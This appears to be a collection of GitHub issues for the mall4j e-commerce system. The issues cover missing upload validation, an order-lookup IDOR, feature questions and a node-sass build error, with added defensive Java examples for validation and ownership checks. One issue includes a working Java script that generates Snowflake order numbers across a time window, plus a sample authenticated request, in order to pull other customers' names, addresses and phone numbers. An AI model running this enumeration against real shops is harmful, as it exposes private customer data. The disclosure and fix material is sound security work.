gz-yami / mall4j
⭐️⭐️⭐️ E-commerce mall: mini-program e-commerce mall system, PC mall, H5 mall, APP mall, Java mall, O2O mall, cross-border mall
Home Page: https://www.mall4j.com
License: GNU Affero General Public License v3.0
Lack of proper validation for uploaded image files in the backend.
While there is validation in the frontend component "index.vue," it is crucial to perform server-side validation as well. This vulnerability allows attackers to upload files of any type and size, potentially leading to XSS attacks or resource exhaustion, which can result in DDoS attacks.
Two interfaces are affected:
com.yami.shop.admin.controller.FileController.uploadElementFile
com.yami.shop.admin.controller.FileController.uploadTinymceEditorImages
It is recommended to implement server-side validation for uploaded image files in `String com.yami.shop.service.impl.AttachFileServiceImpl.uploadFile(MultipartFile file)`. This includes checking the file size and verifying that the file type is allowed (e.g., image/jpeg, image/png). By implementing these validations in the backend, you can prevent the upload of malicious files, mitigate the risk of XSS attacks, and prevent resource consumption that could lead to DDoS attacks.
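The following is an added example of the server-side checks the issue above asks for, written against Spring's `MultipartFile`; it is not mall4j's own code, and the class name `ImageUploadValidator`, the 2 MiB limit and the allowed-type list are assumptions. It checks size, the declared content type and the extension, and then sniffs the leading bytes of the stream, because the `Content-Type` header and the file name are both supplied by the client and can be set to anything.

```java
// Added example (not mall4j's own code): checks an upload handler could run
// before storing an image. Requires Java 9+ and spring-web on the classpath.
import org.springframework.web.multipart.MultipartFile;

import java.io.IOException;
import java.io.InputStream;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

public final class ImageUploadValidator {

    /** Upper bound on accepted size; 2 MiB is an assumed policy value. */
    private static final long MAX_BYTES = 2L * 1024 * 1024;

    /** Declared content types accepted; client-controlled, so checked but not trusted alone. */
    private static final Set<String> ALLOWED_TYPES = Set.of("image/jpeg", "image/png");

    /** Accepted extensions, lower-cased. */
    private static final Set<String> ALLOWED_EXT = Set.of("jpg", "jpeg", "png");

    /** Leading bytes the stream must start with, keyed by declared type. */
    private static final Map<String, byte[]> MAGIC = Map.of(
        "image/jpeg", new byte[] {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "image/png",  new byte[] {(byte) 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A});

    private ImageUploadValidator() {}

    /**
     * Throws IllegalArgumentException when the upload fails any check and
     * returns the verified content type, so the caller stores that value
     * rather than whatever the client declared.
     */
    public static String validate(MultipartFile file) throws IOException {
        if (file == null || file.isEmpty()) {
            throw new IllegalArgumentException("empty upload");
        }
        if (file.getSize() > MAX_BYTES) {
            throw new IllegalArgumentException("file exceeds " + MAX_BYTES + " bytes");
        }
        String declared = file.getContentType();
        if (declared == null || !ALLOWED_TYPES.contains(declared)) {
            throw new IllegalArgumentException("content type not allowed: " + declared);
        }
        String ext = extensionOf(file.getOriginalFilename());
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        // Sniff the real bytes: header and file name are attacker-controlled.
        byte[] expected = MAGIC.get(declared);
        byte[] head = new byte[expected.length];
        try (InputStream in = file.getInputStream()) {
            int read = in.readNBytes(head, 0, head.length);
            if (read != head.length || !Arrays.equals(head, expected)) {
                throw new IllegalArgumentException("file content does not match " + declared);
            }
        }
        return declared;
    }

    /** Extension of the last path segment, lower-cased; "" when there is none. */
    static String extensionOf(String name) {
        if (name == null) {
            return "";
        }
        // Drop any directory part a client might send before taking the extension.
        int slash = Math.max(name.lastIndexOf('/'), name.lastIndexOf('\\'));
        String base = name.substring(slash + 1);
        int dot = base.lastIndexOf('.');
        return dot < 0 ? "" : base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }
}
```

The caller should also write the file under a server-generated name with the verified extension, so that neither the stored path nor the served `Content-Type` depends on client input; the size limit here should match the `spring.servlet.multipart.max-file-size` limit configured for the application, since a rejected upload has still consumed bandwidth and temp storage by the time this method runs.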
Could a customer-service IM be added?
Hello, is the open-source code of this version visible in the repository free for commercial use?
It seems not to be synchronized with the code on Gitee (码云); several empty methods are not implemented.
Is there a problem with the table design for products, categories and brands? Also, some tables have no data.
After the user has logged in, send the following data:
```http
GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2
Host: b2b2c-api.mall4j.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: zh
Accept-Encoding: gzip, deflate
Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q
Origin: https://pc.mall4j.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
```
The user can input other users' orderNumbers to obtain their private information, including address, name, phone number and so on.
I wrote a script that can generate orderNumbers; an attacker can get the information of orders created on any day.
Script:
```java
import cn.hutool.core.date.SystemClock;
import cn.hutool.core.util.IdUtil;
import cn.hutool.core.util.StrUtil;

import java.io.*;
import java.util.Date;

public class test implements Serializable {

    public static void main(String[] args) throws IOException {
        FileWriter f = new FileWriter("/mall4j-master/1.txt");
        FileOutputStream out = null;
        for (long i = 1666884749000l; i <= 1666884750000l; i++) {
            for (long j = 31l; j <= 31l; j++) {
                test test1 = new test(1, 1);
                // out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));
                String str = String.valueOf(test1.nextId(i));
                System.out.println(str);
                f.write(str + "\n");
            }
        }
        // System.out.println(test1.nextId(1666885538000l));
        f.close();
    }

    private static final long serialVersionUID = 1L;

    public static long DEFAULT_TWEPOCH = 1288834974657L;
    public static long DEFAULT_TIME_OFFSET = 2000L;

    private static final long WORKER_ID_BITS = 5L;
    private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
    private static final long DATA_CENTER_ID_BITS = 5L;
    private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);
    private static final long SEQUENCE_BITS = 12L;
    private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;
    private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;
    private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;
    private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS); // 4095

    private long twepoch;
    private long workerId;
    private long dataCenterId;
    private boolean useSystemClock;
    private long timeOffset;
    private long sequence = 0L;
    private long lastTimestamp = -1L;

    public test() {
        this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
    }

    public test(long workerId) {
        this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
    }

    public test(long workerId, long dataCenterId) {
        this(workerId, dataCenterId, false);
    }

    public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
        this(null, workerId, dataCenterId, isUseSystemClock);
    }

    public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
        this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
    }

    public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
        if (null != epochDate) {
            this.twepoch = epochDate.getTime();
            System.out.println("null != epochDate");
        } else {
            // Thu, 04 Nov 2010 01:42:54 GMT
            this.twepoch = DEFAULT_TWEPOCH;
        }
        if (workerId > MAX_WORKER_ID || workerId < 0) {
            throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
        }
        if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
            throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
        }
        this.workerId = workerId;
        this.dataCenterId = dataCenterId;
        this.useSystemClock = isUseSystemClock;
        this.timeOffset = timeOffset;
    }

    public long getWorkerId(long id) {
        return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
    }

    public long getDataCenterId(long id) {
        return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
    }

    public long getGenerateDateTime(long id) {
        return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
    }

    public synchronized long nextId(long time0) {
        long timestamp = time0;
        if (timestamp < this.lastTimestamp) {
            if (this.lastTimestamp - timestamp < timeOffset) {
                // Tolerate the configured clock drift to avoid errors caused by NTP adjustments.
                timestamp = lastTimestamp;
            } else {
                // If the server clock is wrong (moved backwards), raise an error.
                throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
            }
        }
        if (timestamp == this.lastTimestamp) {
            final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
            if (sequence == 0) {
                timestamp = tilNextMillis(lastTimestamp, time0);
            }
            this.sequence = sequence;
        } else {
            sequence = 0L;
        }
        lastTimestamp = timestamp;
        long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
                | (dataCenterId << DATA_CENTER_ID_SHIFT)
                | (workerId << WORKER_ID_SHIFT)
                | sequence;
        return result;
    }

    public String nextIdStr() {
        // return Long.toString(nextId());
        return null;
    }

    // ---------------------------------------------------------------- Private method start
    private long tilNextMillis(long lastTimestamp, long time0) {
        long timestamp = time0;
        while (timestamp == lastTimestamp) {
            timestamp = time0;
        }
        if (timestamp < lastTimestamp) {
            // If the new timestamp is smaller than the last recorded one, the OS clock has moved backwards; raise an error.
            throw new IllegalStateException(
                    StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
        }
        return timestamp;
    }

    private long genTime() {
        return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
    }
    // ---------------------------------------------------------------- Private method end
}
```
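The report above shows that a Snowflake-style order number carries a timestamp, a worker id and a sequence, so it is predictable rather than secret; the fix is not a harder-to-guess identifier but an ownership check on every lookup. The following added example (not mall4j's own code; `OrderQueryService`, `OrderRepository` and the `Order` record are hypothetical, and it assumes Java 16+) shows the shape of that check for an endpoint that, like `getOrderPayInfoByOrderNumber`, accepts a comma-separated `orderNumbers` parameter.

```java
// Added example (not mall4j's own code): order lookup that returns details only
// for orders owned by the authenticated caller. All names here are hypothetical.
import java.util.Arrays;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Optional;

public final class OrderQueryService {

    /** Minimal order record; the real one carries address, name, phone and payment data. */
    public record Order(String orderNumber, String ownerUserId, String deliveryName, String phone) {}

    /** Lookup abstraction so the check can be exercised without a database. */
    public interface OrderRepository {
        Optional<Order> findByOrderNumber(String orderNumber);
    }

    public static final class AccessDeniedException extends RuntimeException {
        public AccessDeniedException(String msg) { super(msg); }
    }

    private final OrderRepository repo;

    public OrderQueryService(OrderRepository repo) {
        this.repo = Objects.requireNonNull(repo);
    }

    /**
     * Returns the order only when it belongs to callerUserId. A missing order and
     * another user's order produce the same exception and message, so the endpoint
     * does not reveal which order numbers exist.
     */
    public Order getOwnOrder(String callerUserId, String orderNumber) {
        Objects.requireNonNull(callerUserId, "caller must be authenticated");
        return repo.findByOrderNumber(orderNumber)
                .filter(o -> callerUserId.equals(o.ownerUserId()))
                .orElseThrow(() -> new AccessDeniedException("order not found"));
    }

    /** Same rule applied to the comma-separated form the endpoint accepts; one foreign id rejects the whole request. */
    public List<Order> getOwnOrders(String callerUserId, String orderNumbers) {
        return Arrays.stream(orderNumbers.split(","))
                .map(String::trim)
                .filter(s -> !s.isEmpty())
                .map(n -> getOwnOrder(callerUserId, n))
                .toList();
    }

    // Stand-alone run over constructed sample data (user ids, names and phone numbers are made up).
    public static void main(String[] args) {
        String own = "1585796527123730432";     // order number from the report above
        String foreign = "1585796527123730433"; // constructed neighbouring id
        Map<String, Order> table = Map.of(
                own, new Order(own, "user-a", "A", "13800000000"),
                foreign, new Order(foreign, "user-b", "B", "13900000000"));
        OrderQueryService svc = new OrderQueryService(n -> Optional.ofNullable(table.get(n)));

        System.out.println(svc.getOwnOrder("user-a", own).deliveryName());
        try {
            svc.getOwnOrders("user-a", own + "," + foreign);
        } catch (AccessDeniedException e) {
            System.out.println("denied: " + e.getMessage());
        }
    }
}
```

The caller id must come from the authenticated session (the `Authorization` token in the request above), never from a request parameter, and the same filter belongs on every other order-by-number endpoint; a repository query of the form "order number AND owner" is the equivalent in SQL or MyBatis and avoids loading the row before rejecting it.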
Let me paste an important log: the node-sass installation failed. Baidu says it needs Python 3 support?
```
gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.
gyp ERR! cwd C:\Users\yikong\Desktop\mall4v-master\node_modules\node-sass
gyp ERR! node -v v14.15.4
gyp ERR! node-gyp -v v3.8.0
gyp ERR! not ok
npm ERR! [email protected] postinstall: `node scripts/build.js`
npm ERR! Exit status 1
```